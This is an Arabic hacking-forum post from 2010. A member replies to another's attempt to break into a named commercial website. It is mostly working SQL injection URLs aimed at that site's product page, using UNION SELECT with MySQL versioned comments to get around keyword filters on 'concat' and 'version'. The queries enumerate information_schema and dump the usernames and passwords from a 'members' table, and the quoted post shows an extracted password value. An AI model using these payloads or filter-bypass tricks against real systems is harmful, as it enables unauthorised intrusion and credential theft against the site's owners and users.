عرض مشاركة واحدة
قديم 12-13-2010, 01:31 PM   رقم المشاركة : 89 (permalink)
معلومات العضو
aircrack -ng
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة إسلام العالم
إليكم وين صلت

أول الشي الموقع عليه حماية على أمر العواميد تم التخطي هكذا



بعدين في حماية على @@version تخطينا هكذا



الموقع عليه حماية على امر concat يا شباب تم التخطيب هكدا



إسم الجدول : members

إسم عامود الباس : pass_word

إسم عامود اليوزر : public

باس :7684

اليوزر : 4

لا أعرف إذا الشغل صحيح أم لا

هلا اخي
تخطي مشكل معرفة الاصدار

كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5
/*!CONCAT
الموقع مانع كلمة concat
والتخطي ب


كود:
/*!CONCAT
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns
على فكرة الموقع مانع الامر group_ الاستعلام بlimit
فيه جدول واحد فقط
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)
جدول اليوزر

كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+table_name=0x6d656d62657273+limit+1,1
الحقنة كاملة

كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,UNHEX(HEX(/*!CONCAT(user_name,0x3a,id,0x3a,pass_word))) ,3,4,5+from+members
وللبحث عن شيخ القبيلة استعمل limit